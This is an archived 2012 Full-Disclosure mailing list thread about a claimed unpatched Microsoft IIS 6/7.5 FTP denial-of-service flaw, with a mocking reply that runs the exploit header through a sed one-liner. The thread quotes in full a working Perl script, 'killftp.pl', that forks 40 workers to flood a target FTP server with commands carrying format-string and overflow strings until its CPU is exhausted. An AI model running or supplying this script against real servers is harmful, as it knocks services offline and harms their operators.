lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon, 16 Jul 2012 15:43:53 -0400
From: Григорий Братислава <musntlive@...il.com>
To: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Unpatched IIS Vulnerabilities / Microsoft
 July Security Bulletin

MusntLive is find your problem:

echo "

>
> # Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of
> Service (CPU exhaustion)
> # Date: June 29, 2012
> # Author: coolkaveh
> # coolkaveh@...ketmail.com
> # https://twitter.com/coolkaveh
> # Vendor Homepage: http://www.microsoft.com
> # Version:  Microsoft IIS 6 , 7.5  FTP Server
> # Tested on: windows server 2008 r2 , seven ,
> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> #When sending multiple parallel FTP command  requests to a Microsoft
> IIS FTP Server
> #CPU usage goes up to max capacity  and server gets non responsive.
> test it with two core
> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> # Lame Microsoft IIS FTP Server Remote Denial Of Service
> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


" | sed 's:coo:xXxcoo:g;s:veh:vehxXx:g;s:>
::g;s:e:3:g;s:a:@:g;s:i:\!:g;s:u:\\\/:g;s:o:\(\):g'

Is code of yours is not hacker code. MusntLive patch is your code
above. Re-test. Tested under BeOS is confirmed



On Mon, Jul 16, 2012 at 3:18 PM, kaveh ghaemmaghami
<kavehghaemmaghami@...glemail.com> wrote:
> Hi OK i will  plus they didn't fix
> http://seclists.org/fulldisclosure/2012/Jul/27
>
>
> # Exploit Title: Microsoft IIS 6 , 7.5  FTP Server Remote Denial Of
> Service (CPU exhaustion)
> # Date: June 29, 2012
> # Author: coolkaveh
> # coolkaveh@...ketmail.com
> # https://twitter.com/coolkaveh
> # Vendor Homepage: http://www.microsoft.com
> # Version:  Microsoft IIS 6 , 7.5  FTP Server
> # Tested on: windows server 2008 r2 , seven ,
> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> #When sending multiple parallel FTP command  requests to a Microsoft
> IIS FTP Server
> #CPU usage goes up to max capacity  and server gets non responsive.
> test it with two core
> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> # Lame Microsoft IIS FTP Server Remote Denial Of Service
> #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> #!/usr/bin/perl -w
> use IO::Socket;
> use Parallel::ForkManager;
> $|=1;
> sub usage {
>     print "Please DISABLE firewall daemon of this operating system first!\n";
>     print "FTP Server Remote Denial Of Service\n";
>     print "by coolkaveh\n";
>     print "usage: perl killftp.pl <host> \n";
>     print "example: perl killftp.pl www.example.com \n";
> }
> $host=shift;
> $port=shift || "21";
> if(!defined($host)){
>         print "Please DISABLE firewall daemon of this operating system first!\n";
>     print "FTP Server Remote Denial Of Service\n";
>     print "by coolkaveh\n";
>         print "coolkaveh@...ketmail.com\n";
>     print "usage: perl killftp.pl <host> \n";
>     print "example: perl killftp.pl www.example.com \n";
>         exit(0);
> }
> $check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
> if(defined $check_first){
>         print "$host -> $port is alive.\n";
>         $check_first->close;
> }
> else{
> die("$host -> $port is closed!\n");
> }
> @junk=('A'x5,'A'x17,'A'x33,'A'x65,'A'x76,'A'x129,'A'x257,'A'x513,'A'x1024,
> '%s%p%x%d','024d','%.2049d','%p%p%p%p','%x%x%x%x','%d%d%d%d','%s%s%s%s','%99999999999s',
> '%08x','%%20d','%%20n','%%20x','%%20s','%s%s%s%s%s%s%s%s%s%s','%p%p%p%p%p%p%p%p%p%p',
> '%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%','%s'x129,'%x'x257,'-1','0','0x100',
> '0x1000','0x3fffffff','0x7ffffffe','0x7fffffff','0x80000000','0xfffffffe','0xffffffff','0x10000','0x100000','1',
> );
> @command=(
> 'NLST','CWD','STOR','RETR',
> 'MKD','RMD','DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE',
> 'APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE
> L','TYPE I','NLST','CWD', 'STOR','RETR','MKD',
> 'RMD', 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
> 'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
> 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
> 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
> 'SIZE','STAT','ACCT',    'HELP','MODE','APPE','STRU','SITE','SITE
> INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
> 'NLST','CWD','STOR','RETR','MKD','RMD',
> 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
> 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
> I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
> 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
> INDEX','TYPE','TYPE A','TYPE E',
> 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
> 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
> 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
> );
> print "Dosing Server!\n";
> $pm = new Parallel::ForkManager(40);
> while (1) {
> my $pid = $pm->start and next;
>    COMMAND_LIST: foreach $cmd (@command){
>         foreach $poc (@junk){
>                 LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
> PeerPort=>$port, Proto=>'tcp', Timeout=>30);
>                 if(defined($sock4)){
>                         $sock4->send("$cmd"." "."$poc\r\n", 0);
>                         $sock4->recv($content, 100, 0);
>                                 }
>                         }
>                 }
>   $pm->finish;
> }
>
>
> On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава
> <musntlive@...il.com> wrote:
>> On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
>> <kavehghaemmaghami@...glemail.com> wrote:
>>> Hello list
>>> in my testing environment (IIS 6 with php5 ) the flaw exist ..... i
>>> think i got da move to XAMPP MS wont patch it   LOL
>>>
>>
>>
>> Test environment is not production environment. Is place your test
>> server in your production network and is send me information for to
>> test.



-- 

`Wherever I is go - there am I routed`

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ